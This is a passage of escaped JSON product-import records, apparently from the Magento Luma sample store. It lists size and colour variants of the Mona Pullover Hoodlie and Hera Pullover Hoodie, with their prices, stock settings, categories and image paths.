Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"992\":{\"sku\":\"WH01-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-L-Orange\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"993\":{\"sku\":\"WH01-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-L-Purple\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"994\":{\"sku\":\"WH01-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-XL-Green\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"995\":{\"sku\":\"WH01-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-XL-Orange\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"996\":{\"sku\":\"WH01-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-XL-Purple\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"997\":{\"sku\":\"WH01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Pullover,material=Wool|Spandex,pattern=Solid,climate=All-weather|Cool|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH01-XS-Green,size=XS,color=Green|sku=WH01-XS-Orange,size=XS,color=Orange|sku=WH01-XS-Purple,size=XS,color=Purple|sku=WH01-S-Green,size=S,color=Green|sku=WH01-S-Orange,size=S,color=Orange|sku=WH01-S-Purple,size=S,color=Purple|sku=WH01-M-Green,size=M,color=Green|sku=WH01-M-Orange,size=M,color=Orange|sku=WH01-M-Purple,size=M,color=Purple|sku=WH01-L-Green,size=L,color=Green|sku=WH01-L-Orange,size=L,color=Orange|sku=WH01-L-Purple,size=L,color=Purple|sku=WH01-XL-Green,size=XL,color=Green|sku=WH01-XL-Orange,size=XL,color=Orange|sku=WH01-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Pullover\",\"material\":\"Wool|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},\"998\":{\"sku\":\"WH02-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-XS-Blue\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"999\":{\"sku\":\"WH02-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-XS-Green\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 